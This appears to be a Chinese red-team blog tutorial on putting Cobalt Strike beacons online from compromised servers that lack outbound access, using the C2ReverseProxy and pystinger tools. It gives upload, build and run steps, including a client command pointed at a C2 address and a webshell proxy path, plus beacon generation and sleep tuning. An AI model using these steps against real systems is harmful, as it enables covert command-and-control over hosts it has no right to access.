首页 > 其他分享 >工具推荐之不出网环境下上线CS

工具推荐之不出网环境下上线CS

时间:2023-08-07 17:32:22浏览次数:52  
标签:上线 目标 stinger CS 服务器 工具 之不出

前言



在实战演练中,我们经常会遇到目标不出网的情况,即便获取了目标权限也不方便在目标网络进行下一步横向移动。本期我们将会推荐两个常用的代理工具,使我们能在不出网的环境下让目标上线到CS,方便后的工作。




工具1:DReverseServer


工具链接:

https://github.com/Daybr4ak/C2ReverseProxy


工具原理:

利用代理转发将目标服务器上的CS的流量特征转发到CS服务端上,类似模拟一个在本地Listener进行上线。


官方使用说明:

1、将C2script目录下的对应文件,如proxy.ashx 以及C2ReverseServer上传到目标服务器。

2、使用C2ReverseServer建立监听端口:

./C2ReverseServer  (默认为64535)

3、修改C2script目录下对应文件的PORT,与C2ReverseServer监听的端口一致。

4、本地或C2服务器上运行C2ReverseClint工具

./C2ReverseClint -t C2IP:C2ListenerPort -u http://example.com/proxy.php (传送到目标服务器上的proxy.php路径)

5、使用CobaltStrike建立本地Listener(127.0.0.1 64535)端口与C2ReverseServer建立的端口对应

6、使用建立的Listner生成可执行文件beacon.exe传至目标服务器运行

7、可以看到CobaltStrike上线。

工具推荐之不出网环境下上线CS_服务器

DReverseServer复现步骤


1、放置脚本文件到目标服务器

工具推荐之不出网环境下上线CS_服务器_02


2、编译服务端程序


在cmd命令行输入 CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build DReverseServer.go完成受害者端应用程序编译。

工具推荐之不出网环境下上线CS_php_03


3、编译CS端程序


在cmd命令行输入CGO_ENABLED=0 GOOS=darwin GOARCH=amd64 go build DReverseClint.go完成CS端应用程序编译。

工具推荐之不出网环境下上线CS_php_04


4、生成stagerless


Staged 和 Stageless 的区别在于Staged实际功能只是程序执行后和C2 建立连接并接收真正的shellcode,然后加载执行(这里服务器不出网所以导致无法正常建立连接);而 Stageless 直接省去了接收 Payload 的步骤。

工具推荐之不出网环境下上线CS_github_05


5、目标客户端监听

工具推荐之不出网环境下上线CS_php_06


6、CS端监听

工具推荐之不出网环境下上线CS_php_07


7、等待上线

工具推荐之不出网环境下上线CS_服务器_08


8、注意事项


a) 本地复现php脚本需打开socket选项。

工具推荐之不出网环境下上线CS_php_09


b) 建议用户对CS的jar文件中的/resources/default.profile进行修改,将sleeptime值修改1000以下,这样CS生存的上线就不用默认等待60秒。

工具推荐之不出网环境下上线CS_php_10


工具2:pystinger


工具链接:

https://github.com/FunnyWolf/pystinger/


工具原理:

利用内网反向代理转发将目标服务器上的上线与连接、操作流量特征通过HTTP协议方式转发至C2服务端,使其目标在不出网情况下上线MSF、viper、CS。


官方使用说明:

详见https://github.com/FunnyWolf/pystinger/blob/master/readme_cn.md


pystinger复现步骤


工具可分为2块内容:


1、stinger_server程序+proxy脚本。

2、stinger_client程序+程序

工具推荐之不出网环境下上线CS_服务器_11


1、放置脚本文件到目标服务器


访问下图页面代表成功。

工具推荐之不出网环境下上线CS_服务器_12


2、在目标机器运行stinger_server

工具推荐之不出网环境下上线CS_服务器_13


3、在CS端运行stinger_client

工具推荐之不出网环境下上线CS_服务器_14


4、生成


根据stinger_server反馈的Payload端口,在CS界面新增一个Listener,并使用这个Listener新生成一个恶意。

工具推荐之不出网环境下上线CS_服务器_15


我们通过命令界面能看到网络连接详情,最后愉快的开启内网。

工具推荐之不出网环境下上线CS_php_16

工具推荐之不出网环境下上线CS_github_17

工具推荐之不出网环境下上线CS_php_18

标签:上线,目标,stinger,CS,服务器,工具,之不出
From: https://blog.51cto.com/u_15634773/6995787

相关文章

  • docker-compose快速部署elasticsearch-8.8.1集群+kibana+logstash
    安装环境centos7.98cpu16G内存vda50Gvdb100G如果您的环境是Linux,注意要做以下操作,否则es可能会启动失败用编辑工具打开文件/etc/sysctl.conf在尾部添加一行配置vm.max_map_count=262144,如果已存在就修改,数值不能低于262144修改保存,然后执行命令sudosysctl-p使其立即......
  • 【考后总结】8 月 CSP-S 模拟赛 2
    8.7CSP模拟15只因你太美-蔡徐坤>只因你太美baby只因你太美baby>>只因你实在是太美baby只因你太美baby>>迎面走来的你让我如此蠢蠢欲动>>这种感觉我从未有>>CauseIgotacrushonyouwhoyou>>你是我的我是你的谁>>再多一眼看一眼就会爆......
  • 在vite中使用postcss
    postcss是什么?1,增强代码的可读性利用从CanIUse网站获取的数据为CSS规则添加特定厂商的前缀。Autoprefixer自动获取浏览器的流行度和能够支持的属性,并根据这些数据帮你自动为CSS规则添加前缀。2,将未来的CSS特性带到今天PostCSSPresetEnv帮你将最新的CSS语法转......
  • Qt CSV
    1.代码#include<QCoreApplication>#include<QFile>#include<QTextStream>intmain(intargc,char*argv[]){QCoreApplicationa(argc,argv);//打开CSV文件QFilefile("data.csv");if(!file.open(QIODevice::ReadWri......
  • [oeasy]python0081_[趣味拓展]ESC键进化历史_键盘演化过程_ANSI_控制序列_转义序列_CS
    光标位置回忆上次内容上次了解了新的转义模式\033逃逸控制字符escape这个字符让字符串退出标准输出流进行控制信息的设置可以设置光标输出的位置ASR33中的ALTMODE是今天的ESC键吗????......
  • HTML5CSS3提高
    1HTML5新特性1.1概述HTML5的新增特性主要是针对于以前的不足,增加了一些新的标签、新的表单和新的表单属性等。这些新特性都有兼容性问题,基本是IE9+以上版本的浏览器才支持,如果不考虑兼容性问题,可以大量使用这些新特性。1.2语义化标签(★★)以前布局,我们基本用div来做......
  • HTML5CSS3基础
    目录HTML5CSS3基础12D转换1.1二维坐标系1.22D转换之移动translate1.32D转换之旋转rotate1.42D转换中心点transform-origin1.52D转换之缩放scale1.62D转换综合写法1.72D转换总结2动画2.1动画的基本使用2.2动画常用属性2.3动画简写属性2.4速度曲线细节33D......
  • ElasticSearch从入门到精通零基础进阶学习路线?
    ElasticSearch从入门到精通零基础进阶学习路线?如果你是零基础初学者,想要系统地学习Elasticsearch并达到精通的水平,下面是一个可能的学习路线:1.学习搜索引擎和Elasticsearch基础知识。-了解搜索引擎的概念和工作原理。-了解Elasticsearch的基本特性和用途。2.安装和配置Elas......
  • CSP模拟14
    不会暴力!不会暴力!第负一题分治+DP只会$n^2$暴力.\(dpl[i][0/1]向左选/不选mid的最大值\)\(dpr[i][0/1]向右选/不选mid的最大值\)$ans=\sum_{i=l}^{mid}\sum_{j=mid+1}^{r}max(dpl[i][0]+dpr[j][0],dpl[i][1]+dpr[j][0],dpr[i][0]+dpr[j][1]),但......
  • CSP模拟13
    T1考场降智,写了个假的模拟,没签上到。T3空间爆了,直接CE(应该是线段树写挂了).yxt在四个角,取最大值,排序.Codefor(inti=1;i<=n;i++){for(intj=1;j<=m;j++){a[++tot]=max({calc(1,1,i,j),calc(i,j,1,m),calc(i,j,n,1),calc(i,j,n,m)});......